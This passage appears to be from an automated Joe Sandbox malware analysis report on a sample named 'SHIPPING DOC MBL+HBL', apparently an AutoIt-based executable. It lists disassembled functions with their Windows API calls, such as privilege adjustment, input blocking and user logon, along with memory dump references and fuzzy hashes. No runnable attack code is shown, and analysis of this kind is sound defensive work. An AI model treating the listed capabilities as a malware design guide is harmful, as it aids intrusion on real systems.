                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ErrorFormatLastMessage
                    • String ID:
                    • API String ID: 3479602957-0
                    • Opcode ID: b8071e9338457d36d44824fdf7cc1aade788e3027410d3e131e388405f404f92
                    • Instruction ID: cd71d5989ac07a0b44f143b0a100d7315e9877252c2a5e42da7cce441a36cfd0
                    • Opcode Fuzzy Hash: b8071e9338457d36d44824fdf7cc1aade788e3027410d3e131e388405f404f92
                    • Instruction Fuzzy Hash: ECF0E23554522DBBDB209FA4CC48FEA77ADFF093A1F004165F809F2180D6309984CBA1
                    Function 00E584F3 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E58631), ref: 00E58508
                    • CloseHandle.KERNEL32(?,?,00E58631), ref: 00E5851A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: AdjustCloseHandlePrivilegesToken
                    • String ID:
                    • API String ID: 81990902-0
                    • Opcode ID: ff6c7c1e4891cb92d9f19f962e94543b21782bd6f76f793f209461e0d8a5e0ba
                    • Instruction ID: 4da15c18f9ccc601a6d0d943f5eae3608e5d85e513b8334373265f46b086bfd5
                    • Opcode Fuzzy Hash: ff6c7c1e4891cb92d9f19f962e94543b21782bd6f76f793f209461e0d8a5e0ba
                    • Instruction Fuzzy Hash: A0E08C32004610AFF7212F61FC08D777BE9EF04311724882DF89AE0471DB22ACA0DB50
                    Function 00E2A2D5 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E28ED7,?,?,?,00000001), ref: 00E2A2DA
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00E2A2E3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 6c4849efe7a0ff1c54eae10928979c07c512a46dc63bde4281134e2965fff092
                    • Instruction ID: e5e96650a48eef351b6382d28677995d01af2e62a20109302c912e9c00a1526b
                    • Opcode Fuzzy Hash: 6c4849efe7a0ff1c54eae10928979c07c512a46dc63bde4281134e2965fff092
                    • Instruction Fuzzy Hash: 21B09231254308AFCA002B92EC09B883F68EB46AA2F404020F60D94060CB6254548B91
                    Function 00E2F359 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 948773515dfefe471a8f46c89856d15cb35807f24706d5192141743c8be69132
                    • Instruction ID: d4df68166191ea50f8612e45b7a9cd27395c96c44b776835097a58fb0d2893ba
                    • Opcode Fuzzy Hash: 948773515dfefe471a8f46c89856d15cb35807f24706d5192141743c8be69132
                    • Instruction Fuzzy Hash: 5A322562D29F114DD7239635D832336A359AFB73C8F15E737E81AB5AA6EB28C4C74100
                    Function 00E325AE Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dff6ceaf32f0abedb99080420e9491856f31b4ec1517edebbfdc32b944a9a2f8
                    • Instruction ID: 1a11bc34e5b3e83fb4bb1dddac2c7f62fdf51fffeccafb554d56a208f69f6884
                    • Opcode Fuzzy Hash: dff6ceaf32f0abedb99080420e9491856f31b4ec1517edebbfdc32b944a9a2f8
                    • Instruction Fuzzy Hash: 6FB11130D2AF404DD723963A8835336BA8CAFBB6C5F55D72BFC6674D22EB2185874181
                    Function 00E7401F Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • BlockInput.USER32(00000001), ref: 00E7403A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: BlockInput
                    • String ID:
                    • API String ID: 3456056419-0
                    • Opcode ID: ba0276039cdfc972a5de5f2e4bbe60af2eb838b3447e0dd5fbfa0913e564798e
                    • Instruction ID: 3589fd9f9abea47da0c17a576c42082340ab7db9b2db22aaccea0f7cc4efdc86
                    • Opcode Fuzzy Hash: ba0276039cdfc972a5de5f2e4bbe60af2eb838b3447e0dd5fbfa0913e564798e
                    • Instruction Fuzzy Hash: BDE048712001145FD710AF59D444A96FBE8AF647A0F00D019FD4DE7392DB70E8448B91
                    Function 00E64CFA Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                    Download Yara Rule
                    APIs
                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00E64D1D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: mouse_event
                    • String ID:
                    • API String ID: 2434400541-0
                    • Opcode ID: 1d17e473596cc5825b36fde455e687505a06c8115e56b090df6b51fc352d1e4c
                    • Instruction ID: 8f2a8ce716f8ffc806db21b963a8cfc651e4bcdba08689ca55e45e4f947e5423
                    • Opcode Fuzzy Hash: 1d17e473596cc5825b36fde455e687505a06c8115e56b090df6b51fc352d1e4c
                    • Instruction Fuzzy Hash: 59D09EE49E460579FC280B20BC1FBB61109F300BDAFA465497606B71C5A8E85C45A435
                    Function 00E58A73 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00E586B1), ref: 00E58A93
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: LogonUser
                    • String ID:
                    • API String ID: 1244722697-0
                    • Opcode ID: 0cabfa572a0816d57320f7ce2b6cd6c61a530b109ef0cf28cf78d2a62f2ad745
                    • Instruction ID: b22122a9391a9f25a82b07e21fea019a4eb6cdc844089885969641a728972e80
                    • Opcode Fuzzy Hash: 0cabfa572a0816d57320f7ce2b6cd6c61a530b109ef0cf28cf78d2a62f2ad745
                    • Instruction Fuzzy Hash: 7CD09E3226450EAFEF019EA4DD05EAE3B69EB04B01F408511FE15D51A1C775D935AB60
                    Function 00E4215F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                    Download Yara Rule
                    APIs
                    • GetUserNameW.ADVAPI32(?,?), ref: 00E42171
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: ac48d87c1148329e05f5945d706d24f84911f08720198d11e8e88b8a1481040d
                    • Instruction ID: baddaa0b808d36e567e0f91615190d38dfc9962350b1cfef27961a79b7f1c53e
                    • Opcode Fuzzy Hash: ac48d87c1148329e05f5945d706d24f84911f08720198d11e8e88b8a1481040d
                    • Instruction Fuzzy Hash: C8C048F1801109DFCB05DBA1EA88DEEB7BCAB08304F2040A6E106F2100D7749B889B72
                    Function 00E2A2A4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                    Download Yara Rule
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00E2A2AA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: a816f6458c704e89912322086d106a0f1de0611329d945dc8b2641fa7f358b06
                    • Instruction ID: 5b5a46477a0c8aed7dd83651fecdb38cdd4e60e6bbb12e351a11ec94d01ae46b
                    • Opcode Fuzzy Hash: a816f6458c704e89912322086d106a0f1de0611329d945dc8b2641fa7f358b06
                    • Instruction Fuzzy Hash: F6A0113000020CAB8A002B82EC08888BFACEB022A0B008020F80C800228B32A8208A80
                    Function 00E18968 Relevance: .6, Instructions: 590COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0b44bd65fe6c8f624e510713d66af8b7647774a9e817973d9595cb79065cadc8
                    • Instruction ID: 4ec0b1f5b3bb75e5067e53873ec1d7243fd94befcc289d06f93b87145db66302
                    • Opcode Fuzzy Hash: 0b44bd65fe6c8f624e510713d66af8b7647774a9e817973d9595cb79065cadc8
                    • Instruction Fuzzy Hash: 93224976508645CBCF388A18C6A4BFD77A1FF01309F64A86ADC56BB591DB309DC5C740
                    Function 00E22345 Relevance: .3, Instructions: 345COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction ID: 9545f027c52ac9ce5f79948cd953770bdfbfe2cbdd504a4b075f918b0ac83ea1
                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction Fuzzy Hash: FEC1993220507309EF2D4639A53413EFFA15EA27B631A27ADE4B3EB1D5EF50C664D620
                    Function 00E2277A Relevance: .3, Instructions: 341COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction ID: 8641f341da8f82053dc25762242d8107a93377b3e8c8392badabd0c8201cae60
                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction Fuzzy Hash: 99C186322151B309EF2D4639953413EBFA15FA27B631A27ADE4B2EB1D4EF10C664D620
                    Function 00E21AF8 Relevance: .3, Instructions: 323COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction ID: 771f4d624d6ec0887daa0f365929d938e7a273c86c9e9259c3505b5f4b507b12
                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction Fuzzy Hash: F9C1643620516349EB2D4639A53413EFAA15EB27B631A27EDE4B3EB1C4EF10C624D610
                    Function 00FEADF8 Relevance: .1, Instructions: 92COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711546126.0000000000FE7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FE7000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_fe7000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                    • Instruction ID: df8bbdcf0dde6b2834821f8431a5b17a078f1061c42e52e3e4bc3c868a913a9c
                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                    • Instruction Fuzzy Hash: EB41B371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90
                    Function 00FEACE8 Relevance: .0, Instructions: 35COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711546126.0000000000FE7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FE7000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_fe7000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                    • Instruction ID: 48469681b11aa8b0118f13314fce1e7597b1c629b015d903811ae251e75d5194
                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                    • Instruction Fuzzy Hash: 91019278E01109EFCB54DF99C5909AEF7B5FB88310F208699E809A7705D730AE41EB81
                    Function 00FEAC88 Relevance: .0, Instructions: 35COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711546126.0000000000FE7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FE7000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_fe7000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                    • Instruction ID: 955479657bb67d7db8fa08c5da43cf74aa3ab1aa137fb5086d4e22e403fdea6a
                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                    • Instruction Fuzzy Hash: D8019278E01109EFCB44DF99C5909AEF7B5FB48310F208599E809A7301D730EE41EB81
                    Function 00FE9658 Relevance: .0, Instructions: 6COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711546126.0000000000FE7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FE7000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_fe7000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                    Function 00E7791B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                    Download Yara Rule
                    APIs
                    • DeleteObject.GDI32(00000000), ref: 00E77970
                    • DeleteObject.GDI32(00000000), ref: 00E77982
                    • DestroyWindow.USER32 ref: 00E77990
                    • GetDesktopWindow.USER32 ref: 00E779AA
                    • GetWindowRect.USER32(00000000), ref: 00E779B1
                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00E77AF2
                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00E77B02
                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77B4A
                    • GetClientRect.USER32(00000000,?), ref: 00E77B56
                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00E77B90
                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77BB2
                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77BC5
                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77BD0
                    • GlobalLock.KERNEL32(00000000), ref: 00E77BD9
                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77BE8
                    • GlobalUnlock.KERNEL32(00000000), ref: 00E77BF1
                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77BF8
                    • GlobalFree.KERNEL32(00000000), ref: 00E77C03
                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77C15
                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00E92CAC,00000000), ref: 00E77C2B
                    • GlobalFree.KERNEL32(00000000), ref: 00E77C3B
                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00E77C61
                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00E77C80
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77CA2
                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77E8F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                    • String ID: $AutoIt v3$DISPLAY$static
                    • API String ID: 2211948467-2373415609
                    • Opcode ID: 3399bc55929403ef78185b64b1a56e2029dba25312dd0fad5bfc44a99be50126
                    • Instruction ID: 05179fcfeb5a7299d46d47950f2b637feafc1b9486d6c73a5c75ab9b7746c3dc
                    • Opcode Fuzzy Hash: 3399bc55929403ef78185b64b1a56e2029dba25312dd0fad5bfc44a99be50126
                    • Instruction Fuzzy Hash: 16027D71900105EFDB14DFA5CC89EAEBBB9EF48310F108169F959BB2A1DB30AD45CB60
                    Function 00E835D4 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?,00E8F910), ref: 00E83690
                    • IsWindowVisible.USER32(?), ref: 00E836B4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
